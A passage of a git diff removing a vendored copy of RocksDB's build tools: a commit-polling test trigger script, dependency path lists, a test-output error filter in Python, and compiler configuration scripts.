-SRC_GIT_REPO=/data/git/rocksdb-public
-error=0
-
-function log {
-  DATE=`date +%Y-%m-%d:%H:%M:%S`
-  echo $DATE $@
-}
-
-function log_err {
-  log "ERROR: $@ Error code: $error."
-}
-
-function update_repo_status {
-  # Update the parent first.
-  pushd $SRC_GIT_REPO
-
-  # This is a fatal error. Something in the environment isn't right and we will
-  # terminate the execution.
-  error=$?
-  if [ ! $error -eq 0 ]; then
-    log_err "Where is $SRC_GIT_REPO?"
-    exit $error
-  fi
-
-  HTTPS_PROXY=fwdproxy:8080 git fetch -f
-
-  error=$?
-  if [ ! $error -eq 0 ]; then
-    log_err "git fetch -f failed."
-    popd
-    return $error
-  fi
-
-  git update-ref refs/heads/master refs/remotes/origin/master
-
-  error=$?
-  if [ ! $error -eq 0 ]; then
-    log_err "git update-ref failed."
-    popd
-    return $error
-  fi
-
-  popd
-
-  # We're back in an instance-specific directory. Get the latest changes.
-  git pull --rebase
-
-  error=$?
-  if [ ! $error -eq 0 ]; then
-    log_err "git pull --rebase failed."
-    return $error
-  fi
-}
-
-#
-# Execution starts here.
-#
-
-# Path to the determinator from the root of the RocksDB repo.
-CONTRUN_DETERMINATOR=./build_tools/RocksDBCommonHelper.php
-
-# Value of the previous commit.
-PREV_COMMIT=
-
-log "Starting to monitor for new RocksDB changes ..."
-log "Running under `pwd` as `whoami`."
-
-# Paranoia. Make sure that we're using the right branch.
-git checkout master
-
-error=$?
-if [ ! $error -eq 0 ]; then
-  log_err "This is not good. Can't checkout master. Bye-bye!"
-  exit 1
-fi
-
-# We'll run forever and let the execution environment terminate us if we'll
-# exceed whatever timeout is set for the job.
-while true;
-do
-  # Get the latest changes committed.
-  update_repo_status
-
-  error=$?
-  if [  $error -eq 0 ]; then
-    LAST_COMMIT=`git log -1 | head -1 | grep commit | awk '{ print $2; }'`
-
-    log "Last commit is '$LAST_COMMIT', previous commit is '$PREV_COMMIT'."
-
-    if [ "$PREV_COMMIT" == "$LAST_COMMIT" ]; then
-      log "There were no changes since the last time I checked. Going to sleep."
-    else
-      if [ ! -z "$LAST_COMMIT" ]; then
-        log "New code has been committed or previous commit not known. " \
-            "Will trigger the tests."
-
-        PREV_COMMIT=$LAST_COMMIT
-        log "Updated previous commit to '$PREV_COMMIT'."
-
-        #
-        # This is where we'll trigger the Sandcastle run. The values for
-        # HTTPS_APP_VALUE and HTTPS_APP_VALUE will be set in the container we're
-        # running in.
-        #
-        POST_RECEIVE_HOOK=1 php $CONTRUN_DETERMINATOR
-
-        error=$?
-        if [ $error -eq 0 ]; then
-          log "Sandcastle run successfully triggered."
-        else
-          log_err "Failed to trigger Sandcastle run."
-        fi
-      else
-        log_err "Previous commit not updated. Don't know what the last one is."
-      fi
-    fi
-  else
-    log_err "Getting latest changes failed. Will skip running tests for now."
-  fi
-
-  # Always sleep, even if errors happens while trying to determine the latest
-  # commit. This will prevent us terminating in case of transient errors.
-  log "Will go to sleep for 5 minutes."
-  sleep 5m
-done
diff --git a/thirdparty/rocksdb/build_tools/dependencies.sh b/thirdparty/rocksdb/build_tools/dependencies.sh
deleted file mode 100644
index 868753b..0000000
--- a/thirdparty/rocksdb/build_tools/dependencies.sh
+++ /dev/null
@@ -1,18 +0,0 @@
-GCC_BASE=/mnt/gvfs/third-party2/gcc/2928bb3ed95bf64f5b388ee88c30dc74710c3b35/5.x/centos6-native/f4950a1
-CLANG_BASE=/mnt/gvfs/third-party2/llvm-fb/a5fea028cb7ba43498976e1f8054b0b2e790c295/stable/centos6-native/6aaf4de
-LIBGCC_BASE=/mnt/gvfs/third-party2/libgcc/7a9099f6587ee4378c0b1fa32bb8934019d30ca4/5.x/gcc-5-glibc-2.23/339d858
-GLIBC_BASE=/mnt/gvfs/third-party2/glibc/3b7c6469854dfc7832a1c3cc5b86919a84e5f865/2.23/gcc-5-glibc-2.23/ca1d1c0
-SNAPPY_BASE=/mnt/gvfs/third-party2/snappy/8c38a4c1e52b4c2cc8a9cdc31b9c947ed7dbfcb4/1.1.3/gcc-5-glibc-2.23/9bc6787
-ZLIB_BASE=/mnt/gvfs/third-party2/zlib/d7861abe6f0e27ab98c9303b95a662f0e4cdedb5/1.2.8/gcc-5-glibc-2.23/9bc6787
-BZIP2_BASE=/mnt/gvfs/third-party2/bzip2/740325875f6729f42d28deaa2147b0854f3a347e/1.0.6/gcc-5-glibc-2.23/9bc6787
-LZ4_BASE=/mnt/gvfs/third-party2/lz4/0815d59804160c96caac5f27ca004f51af893dc6/r131/gcc-5-glibc-2.23/9bc6787
-ZSTD_BASE=/mnt/gvfs/third-party2/zstd/c15a4f5f619a2930478d01e2e34dc1e0652b0873/1.1.4/gcc-5-glibc-2.23/03859b5
-GFLAGS_BASE=/mnt/gvfs/third-party2/gflags/f905a5e1032fb30c05db3d3752319857388c0c49/2.2.0/gcc-5-glibc-2.23/9bc6787
-JEMALLOC_BASE=/mnt/gvfs/third-party2/jemalloc/8d60633d822a2a55849c73db24e74a25e52b71db/master/gcc-5-glibc-2.23/1c32b4b
-NUMA_BASE=/mnt/gvfs/third-party2/numa/17c514c4d102a25ca15f4558be564eeed76f4b6a/2.0.8/gcc-5-glibc-2.23/9bc6787
-LIBUNWIND_BASE=/mnt/gvfs/third-party2/libunwind/8db74270cd6d0212ac92d69e7fc7beefe617d772/trunk/gcc-5-glibc-2.23/b1847cb
-TBB_BASE=/mnt/gvfs/third-party2/tbb/9d9a554877d0c5bef330fe818ab7178806dd316a/4.0_update2/gcc-5-glibc-2.23/9bc6787
-KERNEL_HEADERS_BASE=/mnt/gvfs/third-party2/kernel-headers/90c9734afc5579c9d1db529fa788d09f97763b85/4.0.9-36_fbk5_2933_gd092e3f/gcc-5-glibc-2.23/da39a3e
-BINUTILS_BASE=/mnt/gvfs/third-party2/binutils/9e829389ef61b92c62de8748c80169aaf25ce1f0/2.26.1/centos6-native/da39a3e
-VALGRIND_BASE=/mnt/gvfs/third-party2/valgrind/d7f4d4d86674a57668e3a96f76f0e17dd0eb8765/3.11.0/gcc-5-glibc-2.23/9bc6787
-LUA_BASE=/mnt/gvfs/third-party2/lua/61e4abf5813bbc39bc4f548757ccfcadde175a48/5.2.3/gcc-5-glibc-2.23/65372bd
diff --git a/thirdparty/rocksdb/build_tools/dependencies_4.8.1.sh b/thirdparty/rocksdb/build_tools/dependencies_4.8.1.sh
deleted file mode 100644
index ef0cda2..0000000
--- a/thirdparty/rocksdb/build_tools/dependencies_4.8.1.sh
+++ /dev/null
@@ -1,18 +0,0 @@
-GCC_BASE=/mnt/gvfs/third-party2/gcc/cf7d14c625ce30bae1a4661c2319c5a283e4dd22/4.8.1/centos6-native/cc6c9dc
-CLANG_BASE=/mnt/gvfs/third-party2/llvm-fb/8598c375b0e94e1448182eb3df034704144a838d/stable/centos6-native/3f16ddd
-LIBGCC_BASE=/mnt/gvfs/third-party2/libgcc/d6e0a7da6faba45f5e5b1638f9edd7afc2f34e7d/4.8.1/gcc-4.8.1-glibc-2.17/8aac7fc
-GLIBC_BASE=/mnt/gvfs/third-party2/glibc/d282e6e8f3d20f4e40a516834847bdc038e07973/2.17/gcc-4.8.1-glibc-2.17/99df8fc
-SNAPPY_BASE=/mnt/gvfs/third-party2/snappy/8c38a4c1e52b4c2cc8a9cdc31b9c947ed7dbfcb4/1.1.3/gcc-4.8.1-glibc-2.17/c3f970a
-ZLIB_BASE=/mnt/gvfs/third-party2/zlib/0882df3713c7a84f15abe368dc004581f20b39d7/1.2.8/gcc-4.8.1-glibc-2.17/c3f970a
-BZIP2_BASE=/mnt/gvfs/third-party2/bzip2/740325875f6729f42d28deaa2147b0854f3a347e/1.0.6/gcc-4.8.1-glibc-2.17/c3f970a
-LZ4_BASE=/mnt/gvfs/third-party2/lz4/0e790b441e2d9acd68d51e1d2e028f88c6a79ddf/r131/gcc-4.8.1-glibc-2.17/c3f970a
-ZSTD_BASE=/mnt/gvfs/third-party2/zstd/9455f75ff7f4831dc9fda02a6a0f8c68922fad8f/1.0.0/gcc-4.8.1-glibc-2.17/c3f970a
-GFLAGS_BASE=/mnt/gvfs/third-party2/gflags/f001a51b2854957676d07306ef3abf67186b5c8b/2.1.1/gcc-4.8.1-glibc-2.17/c3f970a
-JEMALLOC_BASE=/mnt/gvfs/third-party2/jemalloc/fc8a13ca1fffa4d0765c716c5a0b49f0c107518f/master/gcc-4.8.1-glibc-2.17/8d31e51
-NUMA_BASE=/mnt/gvfs/third-party2/numa/17c514c4d102a25ca15f4558be564eeed76f4b6a/2.0.8/gcc-4.8.1-glibc-2.17/c3f970a
-LIBUNWIND_BASE=/mnt/gvfs/third-party2/libunwind/ad576de2a1ea560c4d3434304f0fc4e079bede42/trunk/gcc-4.8.1-glibc-2.17/675d945
-TBB_BASE=/mnt/gvfs/third-party2/tbb/9d9a554877d0c5bef330fe818ab7178806dd316a/4.0_update2/gcc-4.8.1-glibc-2.17/c3f970a
-KERNEL_HEADERS_BASE=/mnt/gvfs/third-party2/kernel-headers/7c111ff27e0c466235163f00f280a9d617c3d2ec/4.0.9-36_fbk5_2933_gd092e3f/gcc-4.8.1-glibc-2.17/da39a3e
-BINUTILS_BASE=/mnt/gvfs/third-party2/binutils/b7fd454c4b10c6a81015d4524ed06cdeab558490/2.26/centos6-native/da39a3e
-VALGRIND_BASE=/mnt/gvfs/third-party2/valgrind/d7f4d4d86674a57668e3a96f76f0e17dd0eb8765/3.8.1/gcc-4.8.1-glibc-2.17/c3f970a
-LUA_BASE=/mnt/gvfs/third-party2/lua/61e4abf5813bbc39bc4f548757ccfcadde175a48/5.2.3/centos6-native/730f94e
diff --git a/thirdparty/rocksdb/build_tools/dockerbuild.sh b/thirdparty/rocksdb/build_tools/dockerbuild.sh
deleted file mode 100755
index 02f6094..0000000
--- a/thirdparty/rocksdb/build_tools/dockerbuild.sh
+++ /dev/null
@@ -1,2 +0,0 @@
-#!/usr/bin/env bash
-docker run -v $PWD:/rocks -w /rocks buildpack-deps make
diff --git a/thirdparty/rocksdb/build_tools/error_filter.py b/thirdparty/rocksdb/build_tools/error_filter.py
deleted file mode 100644
index 9f619cf..0000000
--- a/thirdparty/rocksdb/build_tools/error_filter.py
+++ /dev/null
@@ -1,167 +0,0 @@
-#  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-#  This source code is licensed under both the GPLv2 (found in the
-#  COPYING file in the root directory) and Apache 2.0 License
-#  (found in the LICENSE.Apache file in the root directory).
-
-'''Filter for error messages in test output:
-    - Receives merged stdout/stderr from test on stdin
-    - Finds patterns of known error messages for test name (first argument)
-    - Prints those error messages to stdout
-'''
-
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-
-import re
-import sys
-
-
-class ErrorParserBase(object):
-    def parse_error(self, line):
-        '''Parses a line of test output. If it contains an error, returns a
-        formatted message describing the error; otherwise, returns None.
-        Subclasses must override this method.
-        '''
-        raise NotImplementedError
-
-
-class GTestErrorParser(ErrorParserBase):
-    '''A parser that remembers the last test that began running so it can print
-    that test's name upon detecting failure.
-    '''
-    _GTEST_NAME_PATTERN = re.compile(r'\[ RUN      \] (\S+)$')
-    # format: '<filename or "unknown file">:<line #>: Failure'
-    _GTEST_FAIL_PATTERN = re.compile(r'(unknown file|\S+:\d+): Failure$')
-
-    def __init__(self):
-        self._last_gtest_name = 'Unknown test'
-
-    def parse_error(self, line):
-        gtest_name_match = self._GTEST_NAME_PATTERN.match(line)
-        if gtest_name_match:
-            self._last_gtest_name = gtest_name_match.group(1)
-            return None
-        gtest_fail_match = self._GTEST_FAIL_PATTERN.match(line)
-        if gtest_fail_match:
-            return '%s failed: %s' % (
-                    self._last_gtest_name, gtest_fail_match.group(1))
-        return None
-
-
-class MatchErrorParser(ErrorParserBase):
-    '''A simple parser that returns the whole line if it matches the pattern.
-    '''
-    def __init__(self, pattern):
-        self._pattern = re.compile(pattern)
-
-    def parse_error(self, line):
-        if self._pattern.match(line):
-            return line
-        return None
-
-
-class CompilerErrorParser(MatchErrorParser):
-    def __init__(self):
-        # format: '<filename>:<line #>:<column #>: error: <error msg>'
-        super(CompilerErrorParser, self).__init__(r'\S+:\d+:\d+: error:')
-
-
-class ScanBuildErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(ScanBuildErrorParser, self).__init__(
-                r'scan-build: \d+ bugs found.$')
-
-
-class DbCrashErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(DbCrashErrorParser, self).__init__(r'\*\*\*.*\^$|TEST FAILED.')
-
-
-class WriteStressErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(WriteStressErrorParser, self).__init__(
-                r'ERROR: write_stress died with exitcode=\d+')
-
-
-class AsanErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(AsanErrorParser, self).__init__(
-                r'==\d+==ERROR: AddressSanitizer:')
-
-
-class UbsanErrorParser(MatchErrorParser):
-    def __init__(self):
-        # format: '<filename>:<line #>:<column #>: runtime error: <error msg>'
-        super(UbsanErrorParser, self).__init__(r'\S+:\d+:\d+: runtime error:')
-
-
-class ValgrindErrorParser(MatchErrorParser):
-    def __init__(self):
-        # just grab the summary, valgrind doesn't clearly distinguish errors
-        # from other log messages.
-        super(ValgrindErrorParser, self).__init__(r'==\d+== ERROR SUMMARY:')
-
-
-class CompatErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(CompatErrorParser, self).__init__(r'==== .*[Ee]rror.* ====$')
-
-
-class TsanErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(TsanErrorParser, self).__init__(r'WARNING: ThreadSanitizer:')
-
-
-_TEST_NAME_TO_PARSERS = {
-    'punit': [CompilerErrorParser, GTestErrorParser],
-    'unit': [CompilerErrorParser, GTestErrorParser],
-    'release': [CompilerErrorParser, GTestErrorParser],
-    'unit_481': [CompilerErrorParser, GTestErrorParser],
-    'release_481': [CompilerErrorParser, GTestErrorParser],
-    'clang_unit': [CompilerErrorParser, GTestErrorParser],
-    'clang_release': [CompilerErrorParser, GTestErrorParser],
-    'clang_analyze': [CompilerErrorParser, ScanBuildErrorParser],
-    'code_cov': [CompilerErrorParser, GTestErrorParser],
-    'unity': [CompilerErrorParser, GTestErrorParser],
-    'lite': [CompilerErrorParser],
-    'lite_test': [CompilerErrorParser, GTestErrorParser],
-    'stress_crash': [CompilerErrorParser, DbCrashErrorParser],
-    'write_stress': [CompilerErrorParser, WriteStressErrorParser],
-    'asan': [CompilerErrorParser, GTestErrorParser, AsanErrorParser],
-    'asan_crash': [CompilerErrorParser, AsanErrorParser, DbCrashErrorParser],
-    'ubsan': [CompilerErrorParser, GTestErrorParser, UbsanErrorParser],
-    'ubsan_crash': [CompilerErrorParser, UbsanErrorParser, DbCrashErrorParser],
-    'valgrind': [CompilerErrorParser, GTestErrorParser, ValgrindErrorParser],
-    'tsan': [CompilerErrorParser, GTestErrorParser, TsanErrorParser],
-    'format_compatible': [CompilerErrorParser, CompatErrorParser],
-    'run_format_compatible': [CompilerErrorParser, CompatErrorParser],
-    'no_compression': [CompilerErrorParser, GTestErrorParser],
-    'run_no_compression': [CompilerErrorParser, GTestErrorParser],
-    'regression': [CompilerErrorParser],
-    'run_regression': [CompilerErrorParser],
-}
-
-
-def main():
-    if len(sys.argv) != 2:
-        return 'Usage: %s <test name>' % sys.argv[0]
-    test_name = sys.argv[1]
-    if test_name not in _TEST_NAME_TO_PARSERS:
-        return 'Unknown test name: %s' % test_name
-
-    error_parsers = []
-    for parser_cls in _TEST_NAME_TO_PARSERS[test_name]:
-        error_parsers.append(parser_cls())
-
-    for line in sys.stdin:
-        line = line.strip()
-        for error_parser in error_parsers:
-            error_msg = error_parser.parse_error(line)
-            if error_msg is not None:
-                print(error_msg)
-
-
-if __name__ == '__main__':
-    sys.exit(main())
diff --git a/thirdparty/rocksdb/build_tools/fb_compile_mongo.sh b/thirdparty/rocksdb/build_tools/fb_compile_mongo.sh
deleted file mode 100755
index c087f81..0000000
--- a/thirdparty/rocksdb/build_tools/fb_compile_mongo.sh
+++ /dev/null
@@ -1,55 +0,0 @@
-#!/bin/sh
-
-# fail early
-set -e
-
-if test -z $ROCKSDB_PATH; then
-  ROCKSDB_PATH=~/rocksdb
-fi
-source $ROCKSDB_PATH/build_tools/fbcode_config4.8.1.sh
-
-EXTRA_LDFLAGS=""
-
-if test -z $ALLOC; then
-  # default
-  ALLOC=tcmalloc
-elif [[ $ALLOC == "jemalloc" ]]; then
-  ALLOC=system
-  EXTRA_LDFLAGS+=" -Wl,--whole-archive $JEMALLOC_LIB -Wl,--no-whole-archive"
-fi
-
-# we need to force mongo to use static library, not shared
-STATIC_LIB_DEP_DIR='build/static_library_dependencies'
-test -d $STATIC_LIB_DEP_DIR || mkdir $STATIC_LIB_DEP_DIR
-test -h $STATIC_LIB_DEP_DIR/`basename $SNAPPY_LIBS` || ln -s $SNAPPY_LIBS $STATIC_LIB_DEP_DIR
-test -h $STATIC_LIB_DEP_DIR/`basename $LZ4_LIBS` || ln -s $LZ4_LIBS $STATIC_LIB_DEP_DIR
-
-EXTRA_LDFLAGS+=" -L $STATIC_LIB_DEP_DIR"
-
-set -x
-
-EXTRA_CMD=""
-if ! test -e version.json; then
-  # this is Mongo 3.0
-  EXTRA_CMD="--rocksdb \
-    --variant-dir=linux2/norm
-    --cxx=${CXX} \
-    --cc=${CC} \
-    --use-system-zlib"  # add this line back to normal code path
-                        # when https://jira.mongodb.org/browse/SERVER-19123 is resolved
-fi
-
-scons \
-  LINKFLAGS="$EXTRA_LDFLAGS $EXEC_LDFLAGS $PLATFORM_LDFLAGS" \
-  CCFLAGS="$CXXFLAGS -L $STATIC_LIB_DEP_DIR" \
-  LIBS="lz4 gcc stdc++" \
-  LIBPATH="$ROCKSDB_PATH" \
-  CPPPATH="$ROCKSDB_PATH/include" \
-  -j32 \
-  --allocator=$ALLOC \
-  --nostrip \
-  --opt=on \
-  --disable-minimum-compiler-version-enforcement \
-  --use-system-snappy \
-  --disable-warnings-as-errors \
-  $EXTRA_CMD $*
diff --git a/thirdparty/rocksdb/build_tools/fbcode_config.sh b/thirdparty/rocksdb/build_tools/fbcode_config.sh
deleted file mode 100644
index b8609a1..0000000
--- a/thirdparty/rocksdb/build_tools/fbcode_config.sh
+++ /dev/null
@@ -1,156 +0,0 @@
-#!/bin/sh
-#
-# Set environment variables so that we can compile rocksdb using
-# fbcode settings.  It uses the latest g++ and clang compilers and also
-# uses jemalloc
-# Environment variables that change the behavior of this script:
-# PIC_BUILD -- if true, it will only take pic versions of libraries from fbcode. libraries that don't have pic variant will not be included
-
-
-BASEDIR=`dirname $BASH_SOURCE`
-source "$BASEDIR/dependencies.sh"
-
-CFLAGS=""
-
-# libgcc
-LIBGCC_INCLUDE="$LIBGCC_BASE/include"
-LIBGCC_LIBS=" -L $LIBGCC_BASE/lib"
-
-# glibc
-GLIBC_INCLUDE="$GLIBC_BASE/include"
-GLIBC_LIBS=" -L $GLIBC_BASE/lib"
-
-# snappy
-SNAPPY_INCLUDE=" -I $SNAPPY_BASE/include/"
-if test -z $PIC_BUILD; then
-  SNAPPY_LIBS=" $SNAPPY_BASE/lib/libsnappy.a"
-else
-  SNAPPY_LIBS=" $SNAPPY_BASE/lib/libsnappy_pic.a"
-fi
-CFLAGS+=" -DSNAPPY"
-
-if test -z $PIC_BUILD; then
-  # location of zlib headers and libraries
-  ZLIB_INCLUDE=" -I $ZLIB_BASE/include/"
-  ZLIB_LIBS=" $ZLIB_BASE/lib/libz.a"
-  CFLAGS+=" -DZLIB"
-
-  # location of bzip headers and libraries
-  BZIP_INCLUDE=" -I $BZIP2_BASE/include/"
-  BZIP_LIBS=" $BZIP2_BASE/lib/libbz2.a"
-  CFLAGS+=" -DBZIP2"
-
-  LZ4_INCLUDE=" -I $LZ4_BASE/include/"
-  LZ4_LIBS=" $LZ4_BASE/lib/liblz4.a"
-  CFLAGS+=" -DLZ4"
-
-  ZSTD_INCLUDE=" -I $ZSTD_BASE/include/"
-  ZSTD_LIBS=" $ZSTD_BASE/lib/libzstd.a"
-  CFLAGS+=" -DZSTD"
-fi
-
-# location of gflags headers and libraries
-GFLAGS_INCLUDE=" -I $GFLAGS_BASE/include/"
-if test -z $PIC_BUILD; then
-  GFLAGS_LIBS=" $GFLAGS_BASE/lib/libgflags.a"
-else
-  GFLAGS_LIBS=" $GFLAGS_BASE/lib/libgflags_pic.a"
-fi
-CFLAGS+=" -DGFLAGS=gflags"
-
-# location of jemalloc
-JEMALLOC_INCLUDE=" -I $JEMALLOC_BASE/include/"
-JEMALLOC_LIB=" $JEMALLOC_BASE/lib/libjemalloc.a"
-
-if test -z $PIC_BUILD; then
-  # location of numa
-  NUMA_INCLUDE=" -I $NUMA_BASE/include/"
-  NUMA_LIB=" $NUMA_BASE/lib/libnuma.a"
-  CFLAGS+=" -DNUMA"
-
-  # location of libunwind
-  LIBUNWIND="$LIBUNWIND_BASE/lib/libunwind.a"
-fi
-
-# location of TBB
-TBB_INCLUDE=" -isystem $TBB_BASE/include/"
-if test -z $PIC_BUILD; then
-  TBB_LIBS="$TBB_BASE/lib/libtbb.a"
-else
-  TBB_LIBS="$TBB_BASE/lib/libtbb_pic.a"
-fi
-CFLAGS+=" -DTBB"
-
-# use Intel SSE support for checksum calculations
-export USE_SSE=1
-
-BINUTILS="$BINUTILS_BASE/bin"
-AR="$BINUTILS/ar"
-
-DEPS_INCLUDE="$SNAPPY_INCLUDE $ZLIB_INCLUDE $BZIP_INCLUDE $LZ4_INCLUDE $ZSTD_INCLUDE $GFLAGS_INCLUDE $NUMA_INCLUDE $TBB_INCLUDE"
-
-STDLIBS="-L $GCC_BASE/lib64"
-
-CLANG_BIN="$CLANG_BASE/bin"
-CLANG_LIB="$CLANG_BASE/lib"
-CLANG_SRC="$CLANG_BASE/../../src"
-
-CLANG_ANALYZER="$CLANG_BIN/clang++"
-CLANG_SCAN_BUILD="$CLANG_SRC/llvm/tools/clang/tools/scan-build/bin/scan-build"
-
-if [ -z "$USE_CLANG" ]; then
-  # gcc
-  CC="$GCC_BASE/bin/gcc"
-  CXX="$GCC_BASE/bin/g++"
-
-  CFLAGS+=" -B$BINUTILS/gold"
-  CFLAGS+=" -isystem $GLIBC_INCLUDE"
-  CFLAGS+=" -isystem $LIBGCC_INCLUDE"
-  JEMALLOC=1
-else
-  # clang
-  CLANG_INCLUDE="$CLANG_LIB/clang/stable/include"
-  CC="$CLANG_BIN/clang"
-  CXX="$CLANG_BIN/clang++"
-
-  KERNEL_HEADERS_INCLUDE="$KERNEL_HEADERS_BASE/include"
-
-  CFLAGS+=" -B$BINUTILS/gold -nostdinc -nostdlib"
-  CFLAGS+=" -isystem $LIBGCC_BASE/include/c++/5.x "
-  CFLAGS+=" -isystem $LIBGCC_BASE/include/c++/5.x/x86_64-facebook-linux "
-  CFLAGS+=" -isystem $GLIBC_INCLUDE"
-  CFLAGS+=" -isystem $LIBGCC_INCLUDE"
-  CFLAGS+=" -isystem $CLANG_INCLUDE"
-  CFLAGS+=" -isystem $KERNEL_HEADERS_INCLUDE/linux "
-  CFLAGS+=" -isystem $KERNEL_HEADERS_INCLUDE "
-  CFLAGS+=" -Wno-expansion-to-defined "
-  CXXFLAGS="-nostdinc++"
-fi
-
-CFLAGS+=" $DEPS_INCLUDE"
-CFLAGS+=" -DROCKSDB_PLATFORM_POSIX -DROCKSDB_LIB_IO_POSIX -DROCKSDB_FALLOCATE_PRESENT -DROCKSDB_MALLOC_USABLE_SIZE -DROCKSDB_RANGESYNC_PRESENT -DROCKSDB_SCHED_GETCPU_PRESENT -DROCKSDB_SUPPORT_THREAD_LOCAL -DHAVE_SSE42"
-CXXFLAGS+=" $CFLAGS"
-
-EXEC_LDFLAGS=" $SNAPPY_LIBS $ZLIB_LIBS $BZIP_LIBS $LZ4_LIBS $ZSTD_LIBS $GFLAGS_LIBS $NUMA_LIB $TBB_LIBS"
-EXEC_LDFLAGS+=" -B$BINUTILS/gold"
-EXEC_LDFLAGS+=" -Wl,--dynamic-linker,/usr/local/fbcode/gcc-5-glibc-2.23/lib/ld.so"
-EXEC_LDFLAGS+=" $LIBUNWIND"
-EXEC_LDFLAGS+=" -Wl,-rpath=/usr/local/fbcode/gcc-5-glibc-2.23/lib"
-# required by libtbb
-EXEC_LDFLAGS+=" -ldl"
-
-PLATFORM_LDFLAGS="$LIBGCC_LIBS $GLIBC_LIBS $STDLIBS -lgcc -lstdc++"
-
-EXEC_LDFLAGS_SHARED="$SNAPPY_LIBS $ZLIB_LIBS $BZIP_LIBS $LZ4_LIBS $ZSTD_LIBS $GFLAGS_LIBS $TBB_LIBS"
-
-VALGRIND_VER="$VALGRIND_BASE/bin/"
-
-LUA_PATH="$LUA_BASE"
-
-if test -z $PIC_BUILD; then
-  LUA_LIB=" $LUA_PATH/lib/liblua.a"
-else
-  LUA_LIB=" $LUA_PATH/lib/liblua_pic.a"
-fi
-
-export CC CXX AR CFLAGS CXXFLAGS EXEC_LDFLAGS EXEC_LDFLAGS_SHARED VALGRIND_VER JEMALLOC_LIB JEMALLOC_INCLUDE CLANG_ANALYZER CLANG_SCAN_BUILD LUA_PATH LUA_LIB
diff --git a/thirdparty/rocksdb/build_tools/fbcode_config4.8.1.sh b/thirdparty/rocksdb/build_tools/fbcode_config4.8.1.sh
deleted file mode 100644
index f5b8334..0000000
--- a/thirdparty/rocksdb/build_tools/fbcode_config4.8.1.sh
+++ /dev/null
@@ -1,115 +0,0 @@
-#!/bin/sh
-#
-# Set environment variables so that we can compile rocksdb using
-# fbcode settings.  It uses the latest g++ compiler and also
-# uses jemalloc
-
-BASEDIR=`dirname $BASH_SOURCE`
-source "$BASEDIR/dependencies_4.8.1.sh"
-
-# location of libgcc
-LIBGCC_INCLUDE="$LIBGCC_BASE/include"
-LIBGCC_LIBS=" -L $LIBGCC_BASE/lib"
-
-# location of glibc
-GLIBC_INCLUDE="$GLIBC_BASE/include"
-GLIBC_LIBS=" -L $GLIBC_BASE/lib"
-
-# location of snappy headers and libraries
-SNAPPY_INCLUDE=" -I $SNAPPY_BASE/include"
-SNAPPY_LIBS=" $SNAPPY_BASE/lib/libsnappy.a"
-
-# location of zlib headers and libraries
-ZLIB_INCLUDE=" -I $ZLIB_BASE/include"
-ZLIB_LIBS=" $ZLIB_BASE/lib/libz.a"
-
-# location of bzip headers and libraries
-BZIP2_INCLUDE=" -I $BZIP2_BASE/include/"
-BZIP2_LIBS=" $BZIP2_BASE/lib/libbz2.a"
-
-LZ4_INCLUDE=" -I $LZ4_BASE/include"
-LZ4_LIBS=" $LZ4_BASE/lib/liblz4.a"
-
-ZSTD_INCLUDE=" -I $ZSTD_BASE/include"
-ZSTD_LIBS=" $ZSTD_BASE/lib/libzstd.a"
-
-# location of gflags headers and libraries
-GFLAGS_INCLUDE=" -I $GFLAGS_BASE/include/"
-GFLAGS_LIBS=" $GFLAGS_BASE/lib/libgflags.a"
-
-# location of jemalloc
-JEMALLOC_INCLUDE=" -I $JEMALLOC_BASE/include"
-JEMALLOC_LIB="$JEMALLOC_BASE/lib/libjemalloc.a"
-
-# location of numa
-NUMA_INCLUDE=" -I $NUMA_BASE/include/"
-NUMA_LIB=" $NUMA_BASE/lib/libnuma.a"
-
-# location of libunwind
-LIBUNWIND="$LIBUNWIND_BASE/lib/libunwind.a"
-
-# location of tbb
-TBB_INCLUDE=" -isystem $TBB_BASE/include/"
-TBB_LIBS="$TBB_BASE/lib/libtbb.a"
-
-# use Intel SSE support for checksum calculations
-export USE_SSE=1
-
-BINUTILS="$BINUTILS_BASE/bin"
-AR="$BINUTILS/ar"
-
-DEPS_INCLUDE="$SNAPPY_INCLUDE $ZLIB_INCLUDE $BZIP2_INCLUDE $LZ4_INCLUDE $ZSTD_INCLUDE $GFLAGS_INCLUDE $NUMA_INCLUDE $TBB_INCLUDE"
-
-STDLIBS="-L $GCC_BASE/lib64"
-
-if [ -z "$USE_CLANG" ]; then
-  # gcc
-  CC="$GCC_BASE/bin/gcc"
-  CXX="$GCC_BASE/bin/g++"
-
-  CFLAGS="-B$BINUTILS/gold -m64 -mtune=generic"
-  CFLAGS+=" -isystem $GLIBC_INCLUDE"
-  CFLAGS+=" -isystem $LIBGCC_INCLUDE"
-  JEMALLOC=1
-else
-  # clang
-  CLANG_BIN="$CLANG_BASE/bin"
-  CLANG_LIB="$CLANG_BASE/lib"
-  CLANG_INCLUDE="$CLANG_LIB/clang/*/include"
-  CC="$CLANG_BIN/clang"
-  CXX="$CLANG_BIN/clang++"
-
-  KERNEL_HEADERS_INCLUDE="$KERNEL_HEADERS_BASE/include/"
-
-  CFLAGS="-B$BINUTILS/gold -nostdinc -nostdlib"
-  CFLAGS+=" -isystem $LIBGCC_BASE/include/c++/4.8.1 "
-  CFLAGS+=" -isystem $LIBGCC_BASE/include/c++/4.8.1/x86_64-facebook-linux "
-  CFLAGS+=" -isystem $GLIBC_INCLUDE"
-  CFLAGS+=" -isystem $LIBGCC_INCLUDE"
-  CFLAGS+=" -isystem $CLANG_INCLUDE"
-  CFLAGS+=" -isystem $KERNEL_HEADERS_INCLUDE/linux "
-  CFLAGS+=" -isystem $KERNEL_HEADERS_INCLUDE "
-  CXXFLAGS="-nostdinc++"
-fi
-
-CFLAGS+=" $DEPS_INCLUDE"
-CFLAGS+=" -DROCKSDB_PLATFORM_POSIX -DROCKSDB_LIB_IO_POSIX -DROCKSDB_FALLOCATE_PRESENT -DROCKSDB_MALLOC_USABLE_SIZE -DROCKSDB_RANGESYNC_PRESENT -DROCKSDB_SCHED_GETCPU_PRESENT -DROCKSDB_SUPPORT_THREAD_LOCAL -DHAVE_SSE42"
-CFLAGS+=" -DSNAPPY -DGFLAGS=google -DZLIB -DBZIP2 -DLZ4 -DZSTD -DNUMA -DTBB"
